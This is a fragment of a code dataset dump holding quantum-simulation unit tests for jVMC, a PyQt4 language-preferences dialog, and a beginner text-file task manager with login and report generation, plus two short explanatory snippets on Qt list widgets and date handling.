Lindbladian.add({\"name\": \"X\", \"strength\": 3.0, \"sites\": (l,)})\n            Lindbladian.add({\"name\": \"dephasing\", \"strength\": 1.0, \"sites\": (l,)})\n\n        res = {\"X\": [], \"Y\": [], \"Z\": []}\n\n        times = []\n        t=0.\n        while t < Tmax:\n            times.append(t)\n            # record the Pauli expectation values at the current time\n            result = jVMC.operator.povm.measure_povm(self.povm, self.sampler)\n            for dim in [\"X\", \"Y\", \"Z\"]:\n                res[dim].append(jnp.mean(result[dim][\"mean\"]))\n\n            if t > 0.005:\n                self.stepper.set_dt(3e-2)\n\n            dp, stepSize = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n                                             psi=self.psi)\n            \n            t += stepSize\n\n            self.psi.set_parameters(dp)\n\n        times = jnp.array(times)\n\n        # Analytical solution\n        w = jnp.sqrt(35)\n        Sx_avg = jnp.zeros_like(times)\n        Sy_avg = (w * jnp.cos(w * times) - jnp.sin(w * times)) / w * jnp.exp(-times)\n        Sz_avg = 6 / w * jnp.sin(w * times) * jnp.exp(-times)\n\n        print(Sz_avg-jnp.asarray(res[\"Z\"]))\n        self.assertTrue(jnp.allclose(Sx_avg, jnp.asarray(res[\"X\"]), atol=1e-2))\n        self.assertTrue(jnp.allclose(Sy_avg, jnp.asarray(res[\"Y\"]), atol=1e-2))\n        self.assertTrue(jnp.allclose(Sz_avg, jnp.asarray(res[\"Z\"]), atol=1e-2))\n\n    def test_time_evolution_two_site(self):\n        # This tests the time evolution of a sample system and compares it with the analytical solution\n\n        L = 3\n        Tmax = 0.25\n        dt = 2E-3\n\n        self.prepare_net(L, dt, hiddenSize=3, depth=1)\n\n        sx = op.get_paulis()[0]\n        XX_ = jnp.kron(sx, sx)\n        M_2_body = jnp.array(\n            [[jnp.kron(self.povm.M[i], self.povm.M[j]) for j in range(4)] for i in range(4)]).reshape(16, 4, 4)\n        T_inv_2_body = jnp.kron(self.povm.T_inv, self.povm.T_inv)\n\n        self.povm.add_dissipator(\"XX_\", op.matrix_to_povm(XX_, M_2_body, T_inv_2_body, mode=\"dissipative\"))\n\n        Lindbladian = op.POVMOperator(self.povm)\n        Lindbladian.add({\"name\": \"XX_\", \"strength\": 1.0, \"sites\": (0, 1)})\n        Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (0,)})\n        Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (1,)})\n        Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (2,)})\n\n        res = {\"X\": [], \"Y\": [], \"Z\": []}\n\n        times = []\n        t=0.\n        while t < Tmax:\n            times.append(t)\n            # record the Pauli expectation values at the current time\n            result = jVMC.operator.povm.measure_povm(self.povm, self.sampler)\n            for dim in [\"X\", \"Y\", \"Z\"]:\n                res[dim].append(jnp.mean(result[dim][\"mean\"]))\n\n            if t > 0.005:\n                self.stepper.set_dt(2.5e-2)\n\n            dp, stepSize = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n                                             psi=self.psi)\n            \n            t += stepSize\n\n            self.psi.set_parameters(dp)\n\n        times = jnp.array(times)\n\n        # Analytical solution\n        w = jnp.sqrt(35)\n        Sx_avg = -jnp.sin(6 * times) / 3 - 4 / w * jnp.sin(w * times) * jnp.exp(-times)\n        Sy_avg = jnp.cos(6 * times) / 3 + (2 / 3 * jnp.cos(w * times) - 2 / 3 / w * jnp.sin(w * times)) * jnp.exp(-times)\n        Sz_avg = jnp.zeros_like(times)\n\n        self.assertTrue(jnp.allclose(Sx_avg, jnp.asarray(res[\"X\"]), atol=1e-2))\n        self.assertTrue(jnp.allclose(Sy_avg, jnp.asarray(res[\"Y\"]), atol=1e-2))\n        self.assertTrue(jnp.allclose(Sz_avg, jnp.asarray(res[\"Z\"]), atol=1e-2))\n\n    def test_time_evolution_three_site(self):\n        # This tests the time evolution of a sample system and compares it with the analytical solution\n\n        L = 3\n        Tmax = 0.2\n        dt = 5E-4\n\n        self.prepare_net(L, dt, hiddenSize=3, depth=1)\n\n        sx = op.get_paulis()[0]\n        XXX = jnp.kron(jnp.kron(sx, sx), sx)\n        M_3_body = jnp.array(\n            [[[jnp.kron(jnp.kron(self.povm.M[i], self.povm.M[j]), self.povm.M[k]) for j in range(4)] for i in range(4)]\n             for k in range(4)]).reshape(64, 8, 8)\n        T_inv_3_body = jnp.kron(jnp.kron(self.povm.T_inv, self.povm.T_inv), self.povm.T_inv)\n\n        self.povm.add_dissipator(\"XXX\", op.matrix_to_povm(XXX, M_3_body, T_inv_3_body, mode=\"dissipative\"))\n\n        Lindbladian = op.POVMOperator(self.povm)\n        Lindbladian.add({\"name\": \"XXX\", \"strength\": 1.0, \"sites\": (0, 1, 2)})\n        Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (0,)})\n        Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (1,)})\n        Lindbladian.add({\"name\": \"Z\", \"strength\": 3.0, \"sites\": (2,)})\n\n        res = {\"X\": [], \"Y\": [], \"Z\": []}\n\n        times = []\n        t=0.\n        while t < Tmax:\n            times.append(t)\n            # record the Pauli expectation values at the current time\n            result = jVMC.operator.povm.measure_povm(self.povm, self.sampler)\n            for dim in [\"X\", \"Y\", \"Z\"]:\n                res[dim].append(jnp.mean(result[dim][\"mean\"]))\n\n            if t > 0.003:\n                self.stepper.set_dt(1e-2)\n\n            dp, stepSize = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n                                             psi=self.psi)\n            \n            t += stepSize\n\n            self.psi.set_parameters(dp)\n\n        times = jnp.array(times)\n\n        # Analytical solution\n        w = jnp.sqrt(35)\n        Sx_avg = -6 * jnp.sin(w * times) * jnp.exp(-times) / w\n        Sy_avg = jnp.cos(w * times) * jnp.exp(-times) - jnp.sin(w * times) * jnp.exp(-times) / w\n        Sz_avg = jnp.zeros_like(times)\n\n        print(Sx_avg - jnp.asarray(res[\"X\"]))\n        self.assertTrue(jnp.allclose(Sx_avg, jnp.asarray(res[\"X\"]), atol=1e-2))\n        self.assertTrue(jnp.allclose(Sy_avg, jnp.asarray(res[\"Y\"]), atol=1e-2))\n        self.assertTrue(jnp.allclose(Sz_avg, jnp.asarray(res[\"Z\"]), atol=1e-2))\n\n    def test_ground_state_search(self):\n        L = 2\n        dt = 1E-2\n\n        self.prepare_net(L, dt)\n\n        sz = op.get_paulis()[2]\n        self.povm.add_imaginary(\"imag_Z\", op.matrix_to_povm(sz, self.povm.M, self.povm.T_inv, mode='imag'))\n\n        Lindbladian = op.POVMOperator(self.povm)\n        Lindbladian.add({\"name\": \"imag_Z\", \"strength\": 4., \"sites\": (0, )})\n        Lindbladian.add({\"name\": \"imag_Z\", \"strength\": 4., \"sites\": (1, )})\n\n        def measure_energy(confs, probs):\n            return jnp.sum(jVMC.mpi_wrapper.global_mean(self.povm.observables[\"Z\"][confs], probs))\n\n        for i in range(40):\n            dp, _ = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n                                      psi=self.psi)\n            self.psi.set_parameters(dp)\n\n        confs, _, probs = self.sampler.sample()\n        self.assertTrue(jnp.allclose(measure_energy(confs, probs), -2, atol=1e-2))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"markusschmitt/vmc_jax","sub_path":"tests/povm_test.py","file_name":"povm_test.py","file_ext":"py","file_size_in_byte":12142,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"31"}
+{"seq_id":"43083062278","text":"import sqblUI\nimport Canard_settings as settings\nimport isoLangCodes\nfrom PyQt4 import QtCore, QtGui\n\nclass Dialog(QtGui.QDialog, sqblUI.preferencesDialog.Ui_CanardPreferencesDialog):\n    def __init__(self):\n        super(Dialog,self).__init__()\n        self.setupUi(self)  \n        self.tabWidget.setCurrentIndex(0) # select the \"Canard\" pane; this way we can edit and save in QtDesigner with any tab active and still open on the right one.\n        self.setupDisplayLanguageCombo()\n        self.setupDefaultLanguageList()\n        self.setAttribute(QtCore.Qt.WA_DeleteOnClose)\n\n    def setupDisplayLanguageCombo(self):\n        for code,title in isoLangCodes.languageCodeListPairs():\n            self.defaultDisplayLanguage.addItem(title,code)\n        self.defaultDisplayLanguage.insertSeparator(11) # insert after top 10\n        langIndex = self.defaultDisplayLanguage.findData(settings.getPref('displayLanguage'))\n        self.defaultDisplayLanguage.setCurrentIndex(max(0,langIndex))\n\n    def setupDefaultLanguageList(self):\n        self.possibleDefaultNewLangs.setSortingEnabled(True)\n        self.defaultNewLangs.setSortingEnabled(True)\n        for code,title in isoLangCodes.languageCodeListPairs(includeTopTen=False):\n            item = QtGui.QListWidgetItem(title)\n            item.setData(QtCore.Qt.UserRole,code)\n            if code in settings.getPref('defaultObjectLangauges'):\n                self.defaultNewLangs.addItem(item)\n            else:\n                self.possibleDefaultNewLangs.addItem(item)\n        self.addDefaultNewLang.clicked.connect(self.addDefaultLang)\n        self.removeDefaultNewLang.clicked.connect(self.removeDefaultLang)\n\n    def addDefaultLang(self):\n        self.fromListToList(self.possibleDefaultNewLangs,self.defaultNewLangs)\n    def removeDefaultLang(self):\n        self.fromListToList(self.defaultNewLangs,self.possibleDefaultNewLangs)\n    def fromListToList(self,fromList,toList): \n        for item in fromList.selectedItems():\n            row = fromList.row(item)\n            toList.addItem(\n                fromList.takeItem(row)\n            )\n\n    def accept(self):\n        settings.setPref('displayLanguage',\n            self.defaultDisplayLanguage.itemData(\n                self.defaultDisplayLanguage.currentIndex()\n            ).toPyObject()\n        )\n\n        settings.setPref('defaultObjectLangauges',\n            [ str(self.defaultNewLangs.item(i).data(QtCore.Qt.UserRole).toPyObject())\n              for i in range(self.defaultNewLangs.count()) ]\n        )\n\n        settings.setPref('checkForUpdates', self.checkForUpdates.isChecked())\n\n        QtGui.QDialog.accept(self)\n\n","repo_name":"LegoStormtroopr/canard","sub_path":"SQBLWidgets/CanardPreferenceDialog.py","file_name":"CanardPreferenceDialog.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"}
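The fromListToList helper above moves selected items between two QListWidgets with takeItem/addItem. A stripped-down, runnable version of just that mechanic (PyQt4 as in the record; widget contents and names are illustrative):

import sys
from PyQt4 import QtGui

app = QtGui.QApplication(sys.argv)
src, dst = QtGui.QListWidget(), QtGui.QListWidget()
src.addItems(["English", "French", "German"])
src.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
src.item(0).setSelected(True)

for item in src.selectedItems():
    # takeItem detaches the row from the source list; addItem re-parents it
    dst.addItem(src.takeItem(src.row(item)))

print([str(dst.item(i).text()) for i in range(dst.count())])  # ['English']

takeItem is the key call: it removes the QListWidgetItem without deleting it, so the very same item object (including its UserRole data) carries over to the destination list.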
+{"seq_id":"13025368035","text":"#=====importing libraries===========\nfrom datetime import date, timedelta, datetime\nfrom time import sleep\n\n#======= Define Functions ========#\n\n# create a dictionary of all users from a given text file\ndef user_dict(filename):\n\n    # create dictionary to store usernames and passwords\n    user_dict = {}\n\n    # open the user.txt file to retrieve credentials\n    with open(filename, 'r') as f:\n        contents = f.readlines()\n\n    # loop through all lines, tokenise the username and password\n    for i in range(0, len(contents)):\n        tokenised = contents[i].split()\n\n        # strip the comma from the username and store as key-value pairs in the dictionary\n        user_dict[tokenised[0].strip(\",\")] = tokenised[1]\n\n    # return the dictionary of users\n    return user_dict\n\n\n\n# create a dictionary of all the tasks in the task.txt file\ndef all_tasks(filename):\n    \n    # open tasks.txt text file and save each line as an element in the list 'tasks'\n    with open(filename, 'r') as f:\n        tasks = f.readlines()\n\n    # 'task_list' will be a list of dictionaries \n    task_list = []\n\n    # check for empty lines in the file\n    for line in tasks:\n        if (line.strip() != ''):\n\n            # loop through each task in the list, creating a dictionary for each one -\n            # append the created dictionary to 'task_list'\n\n            tokenised = line.split(', ')\n\n            # strip the newline character from any elements in the line\n            tokenised[5] = tokenised[5].strip('\\n')\n\n            # create a dictionary for each task, each loop\n            i = {} \n\n            i['Task'] = tokenised[1]\n            i['Assigned To'] = tokenised[0]\n            i['Date Assigned'] = tokenised[3]\n            i['Due Date'] = tokenised[4]\n            i['Task Complete'] = tokenised[5]\n            i['Task Description'] = tokenised[2]\n\n            # append the dictionary for each task to 'task__list'\n            task_list.append(i)\n\n    return task_list\n\n\n# function to write a new user to the user.txt file from user input\ndef reg_user(user_dict):\n\n    # get user input for new username\n    new_user = input(\"\\nEnter the new username: \\n\").lower()\n\n    # check username does not already exist\n    if new_user in user_dict:\n        print(\"\\nThis username is already in use\\n\")\n    \n    # get user input for new password\n    else:\n        new_pass = input(\"\\nEnter the new password: \\n\")\n\n        # get user to enter password again and check they match\n        new_pass_check = input(\"\\nEnter the password again to check for match: \\n\")\n\n        while new_pass != new_pass_check:\n            print(\"\\nThe passwords do not match. Try again: \\n\")\n\n            new_pass_check = input(\"\\nEnter the password again to check for match: \\n\")\n        \n        else:\n            # append ('a' mode) the new user details to user.txt\n            with open('user.txt', 'a') as f:\n                f.write('\\n' + new_user + ', ' + new_pass)\n            pass\n\n    return\n\n\n# function to add a new task to tasks.txt from user input\ndef add_task(user_dict):\n\n    # get username to add as owner of the new task\n    user = input(\"\\nEnter the username associated with the task you wish to add: \\n\")\n\n    # check user exists\n    while user not in user_dict:\n        print(\"\\nThe user you entered does not exist!\")\n\n        user = input(\"\\nEnter the username associated with the task you wish to add: \\n\")\n\n    # get title\n    title = input(\"\\nEnter the title of the task you wish to add: \\n\")\n\n    # get description\n    description = input(\"\\nEnter a description of the task: \\n\")\n\n    # get the due date of the task (cast to int if arithmetic action necessary)\n    num_days = input(\"\\nEnter the number of days you have to complete the task: \\n\")\n\n    # get the completion status of the task\n    status = input(\"\\nHas the task been completed? Enter 'yes' or 'no': \\n\")\n\n    # validate input matches acceptable parameters\n    if status.lower() == 'yes':\n        pass\n    elif status.lower() == 'no':\n        pass\n    else:\n        print(\"Input error. Please begin the process again.\\nHINT: Make sure you type either 'yes' or 'no'.\")\n\n    # get the current date using our helper function\n    today_date = todaysDate()\n    print(today_date)\n\n    # calculate the due date from the num days user input, using our helper function\n    due_date = dateDelta(num_days)\n\n    # write the new task to 'tasks.txt'\n    with open('tasks.txt', 'a') as t:\n        t.write(user + ', ' + title + ', ' + \n        description + ', ' + str(today_date) + ', ' + str(due_date) + ', ' + status + ', ' + '\\n')\n\n    return\n\n\n# function to view all tasks, taking the list of task dictionaries as a parameter\ndef view_all(task_list):\n\n    # loop through each task dictionary in 'task_list'\n    for i in range(len(task_list)):\n\n        # create upper border\n        print(\"\\n\", (\"-\" * 100))\n\n        # present data in a readable format\n        print(f\"Assigned To:\\t\\t\\t{task_list[i]['Assigned To']}\\nDate Assigned:\\t\\t\\t{datetime.strptime(task_list[i]['Date Assigned'], '%Y-%m-%d').strftime('%d %B %Y')}\\nDue Date:\\t\\t\\t{datetime.strptime(task_list[i]['Due Date'], '%Y-%m-%d').strftime('%d %B %Y')}\\nTask Complete:\\t\\t\\t{task_list[i]['Task Complete']}\\nTask Description:\\n {task_list[i]['Task Description']}\")\n\n        # create lower border\n        print(\"-\" * 100, '\\n')\n\n    return \n\n\n# function to show tasks for a specific user. Takes username and the list of task dictionaries as input\ndef view_mine(user, task_list):\n\n    # to count all tasks associated with current user\n    count = 1\n\n    # create a dictionary of indices that maps the index of each user task in the task_list with its sequential number in the dictionary\n    indices = {}\n\n    # loop over all tasks checking owner of task matches logged in user\n    for i in range(len(task_list)):\n        # if task owner matches current user...\n        # ...save the data as: {count: i} where i is the index of the task in 'task_list'\n        if task_list[i]['Assigned To'] == user:\n            indices[count] = i\n            count += 1\n            pass\n\n    # ask user to select to view all tasks, or a specific task by the user input number \n    selection = int(input(\"Select specific tasks by number, or type '0' to view all. Type '-1' to return to menu: \\n\"))\n    \n    # if user enters -1, return to the main menu\n    if selection == -1:\n        return\n\n    # show all tasks for the logged in user\n    elif selection == 0:\n\n        # print tasks in readable consistent format\n        printAllTasks(task_list, indices)\n    \n    # validation check that user selection is not higher than the number of tasks\n    elif selection > count-1:\n\n        print(\"\\nError. Selection not recognised.\\n\")\n\n    # print the selected task in readable consistent format\n    else:\n\n        # print task in readable format\n        printTask(task_list, indices, selection)\n\n        # ask user if the task is complete\n        complete = input(\"\\nIs this task complete? Enter 'yes' or 'no': \\n\")\n\n        # if task is completed, set 'Task Complete' to 'yes'\n        if complete.lower() == 'yes':\n            task_list[indices[selection]]['Task Complete'] = complete\n\n            # write changes to file\n            writeChanges('tasks.txt', task_list)\n        \n        elif complete.lower() == 'no':\n\n            # set 'task complete' field to 'no'\n            task_list[indices[selection]]['Task Complete'] = complete\n\n            # get input from user to edit task if desired\n            edit = input(\"Would you like to edit the task? Type 'yes' or 'no': \")\n\n            if edit == 'yes':\n                field = input(\"\\nWould you like to edit the user field or the due date field? Type 'user' or 'date': \\n\")\n\n                if field.lower() != 'date' and field.lower() != 'user':\n                    print(\"\\nError. Input not recognised\\n\")\n\n                    field = input(\"\\nWould you like to edit the user field or the due date field? Type 'user' or 'date': \\n\")\n\n                elif field == 'user':\n                    new_user = input(\"\\nEnter the new username: \\n\")\n\n                    task_list[indices[selection]]['Assigned To'] = new_user \n                \n                elif field == 'date':\n                    num_days = input(\"\\nEnter how many days you have from now to complete the task: \\n\")\n                    \n                    # calculate the new due date using our helper function 'dateDelta()'\n                    new_date = dateDelta(num_days)\n\n                    # access the 'Due Date' value from the task at the user selected index \n                    task_list[indices[selection]]['Due Date'] = new_date\n\n                # call function to write changes to file\n                writeChanges('tasks.txt', task_list)\n            \n            elif edit == 'no':\n                print('\\n\\nOkay, exiting back to main menu.....\\n')\n\n            else:\n                print(\"\\nError. Input not recognised.\\n\\n\")\n\n            # call function to write changes to file\n            writeChanges('tasks.txt', task_list)\n\n        # error message to notify user the input was not recognised\n        else:\n            print(\"\\nError. Input not recognised.\\n\")\n\n    return\n\n\n# function to print task in readable format, takes list of task dictionaries, index dictionary and user selection (integer)\ndef printTask(task_list, indices, selection):\n    \n    # print out the task in readable form\n    print(f\"\\nAssigned To:\\t\\t\\t{task_list[indices[selection]]['Assigned To']}\\nDate Assigned:\\t\\t\\t{datetime.strptime(task_list[indices[selection]]['Date Assigned'], '%Y-%m-%d').strftime('%d %B %Y')}\\nDue Date:\\t\\t\\t{datetime.strptime(task_list[indices[selection]]['Due Date'], '%Y-%m-%d').strftime('%d %B %Y')}\\nTask Complete:\\t\\t\\t{task_list[indices[selection]]['Task Complete']}\\nTask Description:\\n {task_list[indices[selection]]['Task Description']}\\n\")\n\n\n# function to print all tasks for specific user\ndef printAllTasks(task_list, indices):\n    # print tasks in readable consistent format\n    for i in indices.values():\n        print(f\"\\nAssigned To:\\t\\t\\t{task_list[i]['Assigned To']}\\nDate Assigned:\\t\\t\\t{datetime.strptime(task_list[i]['Date Assigned'], '%Y-%m-%d').strftime('%d %B %Y')}\\nDue Date:\\t\\t\\t{datetime.strptime(task_list[i]['Due Date'], '%Y-%m-%d').strftime('%d %B %Y')}\\nTask Complete:\\t\\t\\t{task_list[i]['Task Complete']}\\nTask Description:\\n {task_list[i]['Task Description']}\\n\")\n\n\n# function to write changes to file\ndef writeChanges(filename, task_list):\n    \n    # write the amended task dictionaries to 'tasks.txt'\n    # execute logic inside 'with' so as to be able to write each line without closing the file\n    with open(filename, 'w') as f:\n        # loop through each task dictionary in 'task_list'\n        for i in task_list:\n            # create list to append elements in the correct order before writing to 'tasks.txt'\n            buffer = []\n            buffer.append(i['Assigned To'])\n            buffer.append(i['Task'])\n            buffer.append(i['Task Description'])\n            buffer.append(i['Date Assigned'])\n            buffer.append(i['Due Date'])\n            buffer.append(i['Task Complete'])\n            \n            # loop through the reorganised task, writing it to the tasks.txt file\n            for j in buffer:\n                # dont write a comma and space to the final element in the list\n                if '\\n' not in j:\n                    f.write(j + ', ')\n                else:\n                    f.write(j)\n            \n            # add a newline after every task\n            f.write('\\n')\n    \n    # print message to let user know file is being updated, in visually recognisable way\n    print(\"\\n\")\n    for i in range(0,3):\n        print(\"Writing changes....................\")\n        sleep(0.5)\n    print(\"\\nFile Updated\\n\")\n\n\n# function to return today's date\ndef todaysDate():\n    today = date.today()\n    today_date = today.strftime(\"%d %B %Y\")\n\n    return today\n\n\n# function to return the date in readable format in a given number of days\ndef dateDelta(days):\n    today = date.today()\n\n    # calculate the due date from the num days user input\n    due_date = (today + timedelta(days=int(days)))\n    \n    return due_date\n\nprint(dateDelta(10))\n\n# function to generate reports. Takes in task list and user dictionary\ndef generateReports(task_list, users):\n    \n    #=========== task_overview.txt ============#\n\n    # get total number of tasks\n    total_tasks = len(task_list)\n\n    # get total number of completed and incomplete tasks\n    tasks_complete = 0\n    tasks_incomplete = 0\n\n    for i in task_list:\n        if i['Task Complete'] == 'yes':\n            tasks_complete += 1\n\n        # get total number of incomplete tasks\n        else:\n            tasks_incomplete += 1\n    \n    # get total number of tasks that are incomplete and past their due date\n    # get todays date\n    today_date = todaysDate()\n    \n    # count all past due tasks\n    past_due = 0\n    for i in task_list:\n        # only count past due tasks if they are not complete\n        if i['Task Complete'] != 'yes':\n            # compare dates to find past due tasks\n\n            # properly format date and datetime objects for comparison\n            if (today_date) > (datetime.strptime(i['Due Date'], '%Y-%m-%d')).date():\n                past_due += 1\n    \n    # write to task_overview.txt:\n    with open('task_overview.txt', 'w') as f:\n        f.write(f\"Total tasks: {total_tasks}\\nTotal Tasks Past Due: {past_due}\\nTotal tasks Complete: {tasks_complete}\\nTotal Tasks Incomplete: {tasks_incomplete}\\nPercentage of incomplete tasks: {round((tasks_incomplete / total_tasks) * 100, 2)}%\\nPercentage of tasks overdue: {round((past_due / total_tasks) * 100, 2)}%\")\n\n    #=========== task_overview.txt End ============#\n\n\n\n    #============= user_overview.txt ==================\n\n    # total number of users registered\n    total_users = len(users)\n\n    # total number of tasks\n    total_tasks = len(task_list)\n\n    # total tasks for each user\n    # create a dictionary that holds the username as key and the number of related tasks as value\n    # user_task_dict = {}\n    \n    # for i in task_list:\n    \n    #     user = i['Assigned To']\n    #     if user not in user_task_dict:\n    #         count = 1\n    #         user_task_dict[user] = count\n    #     else:\n    #         count = 2\n    #         user_task_dict[user] = count\n    #         count += 1\n    \n    total_user_tasks = dict()\n\n    for i in task_list:\n        user = i['Assigned To']\n        if user not in total_user_tasks:\n            total_user_tasks[user] = 1\n        \n        else:\n            total_user_tasks[user] = total_user_tasks.get(user, 0) + 1\n\n    # add users with 0 assigned tasks\n    for u in users:\n        if u not in total_user_tasks:\n            total_user_tasks[u] = 0 \n    \n    # number of tasks assigned to each user that are completed\n    user_complete_dict = {}\n    for i in task_list:\n        user = i['Assigned To']\n        \n        if i['Task Complete'] == 'yes':\n            user_complete_dict[user] = user_complete_dict.get(user, 0) + 1\n\n    # add users with 0 completed tasks\n    for i in task_list:\n        user = i['Assigned To']\n        if user not in user_complete_dict:\n            user_complete_dict[user] = 0\n\n    # number of incomplete tasks for each user\n    incomplete = dict()\n\n    for i in task_list:\n        user = i['Assigned To']\n        if user not in incomplete:\n            if i['Task Complete'] == 'no':\n                incomplete[user] = 1\n        else:\n            if i['Task Complete'] == 'no':\n                incomplete[user] = incomplete.get(user, 0) + 1\n    \n    # add users with 0 incomplete\n    for i in task_list:\n        user = i['Assigned To']\n        if user not in incomplete:\n            incomplete[user] = 0\n\n    # number of overdue tasks for each user\n    overdue = {}\n    for i in task_list:\n        user = i['Assigned To']\n\n        if i['Task Complete'] == 'no':\n            # properly format date and datetime objects for comparison\n            if (today_date) > (datetime.strptime(i['Due Date'], '%Y-%m-%d')).date():\n                overdue[user] = overdue.get(user, 0) + 1\n    \n    # add users with 0 overdue tasks\n    for i in task_list:\n        user = i['Assigned To']\n        if user not in overdue:\n            overdue[user] = 0\n\n\n    # write output in readable format to 'user_overview.txt' file\n    with open('user_overview.txt', 'w') as f:\n        f.write(f\"Total number of registered users: {total_users}\\nTotal number of tasks: {total_tasks}\\n\\nTotal Tasks Assigned to each User:\\n\")\n\n        # total tasks for each user\n        for key, val in total_user_tasks.items():\n            f.write(f\"\\t{key}: {val}\\n\")\n\n        # percent of tasks assigned to each user\n        f.write(\"\\nPercentage of Tasks Assigned to Each User:\\n\")\n\n        for key, val in total_user_tasks.items():\n            percent = (val/len(task_list)*100)\n            f.write(f\"\\t{key} has {round(percent, 2)}% of the total assigned tasks.\\n\")\n\n        # percent of tasks completed by each user\n        f.write(\"\\nPercentage of Tasks Completed by Each User:\\n\")\n\n        for key, val in user_complete_dict.items():\n            percent_complete = round((val/total_user_tasks[key])*100, 2)\n            f.write(f\"\\t{key} has completed {percent_complete}% of tasks assigned.\\n\")\n\n        # percent of tasks still to be completed\n        f.write(\"\\nPercentage of Tasks Yet to be Completed by Each User:\\n\")\n\n        for key, val in incomplete.items():\n            percent_complete = round((val/total_user_tasks[key])*100, 2)\n            f.write(f\"\\t{percent_complete}% of {key}'s tasks are incomplete.\\n\")\n\n        # percent of overdue tasks yet to be completed\n        f.write(\"\\nPercentage of Tasks Yet to be Completed that are Overdue:\\n\")\n\n        for key, val in overdue.items():\n            percent_past_due = round((val/total_user_tasks[key])*100, 2)\n            f.write(f\"\\t{percent_past_due}% of {key}'s tasks are past due.\\n\")\n\n    \n\n\n# function to show statistics\ndef showStats():\n\n    # get total number of tasks\n    with open('tasks.txt', 'r') as t:\n        num_tasks = len(t.readlines())\n\n    # get total number of users\n    with open('user.txt', 'r') as u:\n        num_users = len(u.readlines())\n\n    print(f\"\\nThere are {num_tasks} tasks.\")\n    print(f\"\\nThere are {num_users} users.\\n\")\n\n\n\n#============= Login Section ============#\n\n# get user dictionary from user.txt\nusers = user_dict('user.txt')\n\n# ask user for username\nusername = input(\"Enter your username: \\n\").lower()\n\n# check username exists in the dictionary\nwhile username.lower() not in users:\n    print(\"Your username is not recognised\")\n\n    # username should not be case sensitive\n    username = input(\"Enter your username: \\n\").lower()\n\n# ask user for password\npassword = input(\"Enter your password: \\n\")\n\n# check user password against dictionary\nwhile password != users[username]:\n    print(\"Your password is not recognised\")\n    \n    # password should be case sensitive\n    password = input(\"Enter your password: \\n\")\n\n#============= Login Section End ============#\n\n\n\n#============= Show Menu ============#\nwhile True:\n\n    # check whether to show admin or regular user menu\n    if username.lower() == 'admin':\n        menu = input('''Select one of the following options below\\n:\n    s - show stats\n    r - Registering a user\n    a - Adding a task\n    va - View all tasks\n    vm - view my task\n    gr - generate reports\n    e - Exit\n: ''').lower()\n\n    else:\n        # presenting the menu to the user and\n        # making sure that the user input is converted to lower case.\n        menu = input('''Select one of the following options below\\n:\n    r - Registering a user\n    a - Adding a task\n    va - View all tasks\n    vm - view my task\n    e - Exit\n    : ''').lower()\n\n    #============= Show Menu End ============#\n    \n\n    #============= Process User Choice ==============#\n\n    # add new user if current user is admin\n    if menu == 'r':\n\n        # if current user is admin:\n        if username.lower() == 'admin':\n            # get latest user dictionary\n            users = user_dict('user.txt')\n\n            # call the register user function\n            reg_user(users)\n        \n        # print error message if user does not have admin privileges\n        else:\n            print(f\"\\nThe user '{username}' does not have admin privileges, and cannot add new users.\\n\")\n\n    # add new task\n    elif menu == 'a':\n\n        # get latest user dictionary\n        users = user_dict('user.txt')\n\n        add_task(users)\n\n    elif menu == 'va':\n\n        # get latest task dictionary\n        tasks = all_tasks('tasks.txt')\n\n        view_all(tasks)\n\n    elif menu == 'vm':\n\n        # get latest task dictionary\n        tasks = all_tasks('tasks.txt')\n        \n        view_mine(username, tasks)\n    \n    # exit the program\n    elif menu == 'e':\n        print('Goodbye!!!')\n        exit()\n\n    # display total users and total tasks\n    elif menu == 's':\n        # if current user is admin:\n        if username.lower() == 'admin':\n\n            # call the show stats function\n            showStats()\n\n\n    # generate reports to 2 text files, 'task_overview' and 'user_overview'\n    elif menu == 'gr':\n\n        if username.lower() == 'admin':\n\n            # get all tasks\n            task_list = all_tasks('tasks.txt')\n\n            # get all users\n            users = user_dict('user.txt')\n\n            # call the generate reports function\n            generateReports(task_list, users)\n\n            # let user know the files have been updated\n            print(f\"\\n'task_overview.txt' and 'user_overview.txt' FILES UPDATED\\n\")\n\n        else:\n            print(\"\\nYou do not have admin privileges. Choose another option.\\n\")\n\n\n    # error handling\n    else:\n        print(\"\\nYou have made a wrong choice, please try again\\n\")\n\n    #============= Process User Choice End ==============#","repo_name":"TechTunist/capstone26","sub_path":"task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":23156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
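The task manager above leans on two stdlib date idioms: offsetting today's date with timedelta (dateDelta) and round-tripping between the stored ISO form and the display form with strptime/strftime. The same round trip in isolation (stdlib only; the format strings are the ones the record uses):

from datetime import date, timedelta, datetime

due = date.today() + timedelta(days=10)
stamp = str(due)                                  # ISO form written to tasks.txt, e.g. 2023-01-01
parsed = datetime.strptime(stamp, '%Y-%m-%d').date()
assert parsed == due
print(parsed.strftime('%d %B %Y'))                # display form used by view_all, e.g. 01 January 2023

Storing ISO strings but displaying '%d %B %Y' is why every print path in the record has to call strptime first: the file format and the display format differ on purpose.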
